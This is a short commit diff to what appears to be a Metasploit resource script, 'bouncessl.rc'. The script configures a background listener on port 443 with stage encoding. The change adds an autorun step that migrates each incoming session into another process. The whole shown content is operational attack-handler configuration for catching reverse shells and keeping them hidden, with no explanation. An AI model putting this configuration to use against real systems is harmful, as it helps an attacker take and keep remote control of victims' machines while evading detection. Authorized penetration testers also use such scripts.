added "set autorunscript migrate -f"

--- a/bouncessl.rc
+++ b/bouncessl.rc
@@ -5,4 +5,5 @@ set exitonsession false
 set lhost 0.0.0.0 
 set lport 443
 set enablestageencoding true
+set autorunscript migrate -f
 exploit -j -z
